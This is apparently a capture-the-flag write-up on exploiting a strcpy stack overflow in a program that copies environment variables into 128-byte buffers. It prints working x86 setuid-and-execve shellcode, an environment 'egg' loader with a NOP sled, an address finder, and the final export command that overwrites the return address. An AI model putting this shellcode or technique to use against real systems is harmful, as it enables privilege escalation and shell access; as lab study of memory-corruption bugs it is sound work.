Chall-4

Shellcode && env

This problem took me around 1 month to solve :( ....

   #include 
    #include 
    #include 
    #include 
     
    struct EnvInfo
    {
      char home[128];
      char username[128];
      char shell[128];  
      char path[128];  
    };
     
     
    struct EnvInfo GetEnv(void)
    {
      struct EnvInfo env;
      char *ptr;
     
      if((ptr = getenv("HOME")) == NULL)
        {
          printf("[-] Can't find HOME.\n");
          exit(0);
        }
      strcpy(env.home, ptr);
      if((ptr = getenv("USERNAME")) == NULL)
        {
          printf("[-] Can't find USERNAME.\n");
          exit(0);
        }
      strcpy(env.username, ptr);
      if((ptr = getenv("SHELL")) == NULL)
        {
          printf("[-] Can't find SHELL.\n");
          exit(0);
        }
      strcpy(env.shell, ptr);
      if((ptr = getenv("PATH")) == NULL)
        {
          printf("[-] Can't find PATH.\n");
          exit(0);
        }
      strcpy(env.path, ptr);
      return env;
    }
     
    int main(void)
    {
      struct EnvInfo env;
     
      printf("[+] Getting env...\n");
      env = GetEnv();
     
      printf("HOME     = %s\n", env.home);
      printf("USERNAME = %s\n", env.username);
      printf("SHELL    = %s\n", env.shell);
      printf("PATH     = %s\n", env.path);
     
      return 0;   
    }

So this looks simple just set environment variable to overflow the buffer with a shellcode and get a shell !!! but the problem i faced is strcpy appends a null byte to adress next to eip which is apparently the dest of an rep movs inst !!! so due to null-byte overflow our whole shellcode gets damaged !!! so solution to this is ..
create another env variable with shellcode using a c code and find it's addr and pass it in our 1'st env-var that's it !

C code for injecting shellcode into an env variable

#include 
#include 
#include 
#define NOP 0x90

char shellcode[] =
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63"
"\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53"
"\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

int main(void)
{
  char shell[512];
  puts("Eggshell loaded into environment.");
  //puts(strlen(shellcode));
  memset(shell,NOP,512);
  memcpy(&shell[512-strlen(shellcode)],shellcode,strlen(shellcode));
  setenv("EGG", shell, 1);
  putenv(shell);
 system("bash");
  return(0); 
}

C code for finding addr of injected Env-var

#include 
#include 
int main(void)
{
   printf("0x%lx\n", getenv("EGG"));
   return 0;
}

So The final Exploit ....


export USERNAME=$(python -c 'import struct ; print "\x90"*416+struct.pack("<I",0xbffffcae)+struct.pack("<I",0xbffff6a0)')

So the Username is filled with (Nop_sled)*416+ &shellcode + &modifyaddr(addr of eip+4)